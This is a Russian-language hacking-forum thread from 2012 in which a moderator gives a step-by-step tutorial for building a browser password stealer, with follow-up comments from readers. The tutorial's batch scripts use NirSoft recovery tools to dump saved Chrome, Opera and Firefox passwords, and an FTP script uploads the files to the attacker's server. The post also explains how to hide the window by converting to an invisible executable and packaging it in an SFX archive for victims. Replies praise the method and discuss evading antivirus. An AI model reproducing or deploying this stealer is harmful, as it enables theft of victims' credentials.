1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

RRR_RRR Stealer :)

Тема в разделе "Кейлоггеры | Стиллеры | Грабберы", создана пользователем ResH, 14 окт 2012.

  1. TopicStarter Overlay
    ResH

    ResH Команда форума

    Регистрация:
    26 июл 2012
    Сообщения:
    1.676
    Симпатии:
    2.268
    Для стиллера мы будем использовать программы компании NirSoft которую они любезно нам дают бесплатно Please login or register to view links

    Из этих программ нас больше всего интересует ChromePass , OperaPassView, PasswordFox
    Эти программы предназначены для восстановление забытых паролей в браузере . Открываешь нужный и видишь пассы .
    Мы из этих программ сделаем стиллер
    Для начала нам нужен скрипт который вытаскивал бы пассы в какой нибудь текстовый файл

    virus.bat
    Код:
    echo off
    start ChromePass.exe /stext passwords_chrom.txt
    start OperaPassView.exe /stext passwords_opera.txt
    If Not Exist "%programfiles%\Mozilla Firefox\" GoTo End
    start PasswordFox.exe /stext passwords_mozilla.txt
    start send.bat
    этот батник экспортирует пассы в текстовые файлы (passwords_chrom.txt , passwords_opera.txt , passwords_mozilla.txt) и потом запускает send.bat

    Вот пассы есть. но они лежат у жертвы , а для того чтоб украсть эти файлы с пассами нам понадобится другой батник (send.bat)

    send.bat
    Код:
     ftp -s:open.scr 0.0.0.0 
    вместо 0.0.0.0 пишем айпи вашего хостинга

    open.scr
    Код:
    login
    password
    put passwords_opera.txt
    put passwords_chrom.txt
    put passwords_mozilla.txt
    quit 
    login- логин от вашего хостинга
    password-пароль от вашего хостинга
    put passwords_opera.txt
    put passwords_chrom.txt
    put passwords_mozilla.txt - файлы с пассами которых батник будет загружать на ваш сервер
    все эти файлы мы кидаем в один архив
    и после того как жертва запустить virus.bat этот батник извлечет пассы в текстовый файл и потом запустить send.bat
    а этот скрипт подключится на ваш сервер и загрузит файлы с пассами
    файл с пассами будут лежат не в public_html а на главной директории , где обычно есть файл с именем DO_NOT_UPLOAD_HERE
    для полной скрытности используйте прогу Bat To Exe Converter rus From ICE_XAKEP (пере конвертом выберите Невидимое приложение в Опции)
    но незабывает в батнике virus.bat менять send.bat на send.ехе до конвертирование в virus.ехе , само собой конвертируем и send.bat в send.ехе
    Все нужные файлы я загрузил в один архив
    вам остается тока отредактировать файлы и конвертировать в ехе
    ну все закидываем все файлы в один архив и с помощи SFX архива клеим все файлы и пихаем подробно Please login or register to view links

    скачать файлы

    **Скрытый текст: Для просмотра скрытого текста Вы должны авторизоваться.**

    Пожалуйста Зарегистрируйтесь или Войдите для того чтоб увидеть текст сообщения!

     
    • Like Like x 13
    Метки:
  2. Prince

    Prince

    Регистрация:
    14 май 2012
    Сообщения:
    448
    Симпатии:
    231
    Интересная статья.
     
  3. Ltybcrf

    Ltybcrf Гость

    Очень интересная статья ... побольше бы таких! +++
     
  4. TopicStarter Overlay
    ResH

    ResH Команда форума

    Регистрация:
    26 июл 2012
    Сообщения:
    1.676
    Симпатии:
    2.268
    не за что
    но для спасибо есть кнопка Мне нравится :)
     
  5. Херка-тян

    Херка-тян

    Регистрация:
    28 июл 2012
    Сообщения:
    220
    Симпатии:
    249
    :eek: Так это что-же, даже криптовать не надо? Если эти программы фирмы NirSoft белые, пушистые и антивирус на них не ругается. Так?
     
  6. TopicStarter Overlay
    ResH

    ResH Команда форума

    Регистрация:
    26 июл 2012
    Сообщения:
    1.676
    Симпатии:
    2.268
    некоторые АВ ругаются:confused:
     
  7. Ltybcrf

    Ltybcrf Гость

    как же тут не заругаешь? ..чистый код, с само копированием и отправкой )
    если дописать туда ещё и работу в %windir% и и упаковать не SmartInstal-ом, а RAR-ом..
    То даже панда ругаться будет имхо )))))))))))))))))))))))))))
     
  8. TopicStarter Overlay
    ResH

    ResH Команда форума

    Регистрация:
    26 июл 2012
    Сообщения:
    1.676
    Симпатии:
    2.268
    интересно то что они ругаются на программы NirSoft , и они не обновляются :(
    а мой код для экспорта и отправки белый и пушистый:)
     
  9. aimpsy

    aimpsy Гость

    Спасибо за статейку)
     
  10. mr.pro

    mr.pro Гость

    Кул!) Спс ТС! Жду продолжния: как стырить остальные пароли... И ещё вопрос: после того, как эти файлы создадутся (во второй раз) куда денутся старые пассы? Может, я косоглазый, но в коде этого, вроде, нет...
     
  11. Iva1

    Iva1 Гость

    me gusta:) наконец то рассмотрели аналоги
    Please login or register to view links
     
  12. aassaa

    aassaa

    Регистрация:
    4 дек 2012
    Сообщения:
    123
    Симпатии:
    30
    отличная статья . ушел пробовать
     
  13. belix2008

    belix2008

    Регистрация:
    3 июн 2012
    Сообщения:
    24
    Симпатии:
    7
    Некоторые антивирусы действительно видят в них опасность, и пишут , что там вирус, но при работе ничего подобного не замечал, у самого стоит нод 32 , запускается файл отлично .
     
  14. Antoha

    Antoha

    Регистрация:
    14 май 2012
    Сообщения:
    72
    Симпатии:
    19
    поставь ккасперского яндекс версию..... пол года бесплатно и даж ломать ненад(ну если ток через пол года:)
     
  15. lave

    lave

    Регистрация:
    10 ноя 2012
    Сообщения:
    133
    Симпатии:
    23
    стояла у меня такая.базы приходится вручную обновлять.версия оболочки 2011 года.а так нормально
     

Поделиться этой страницей

Загрузка...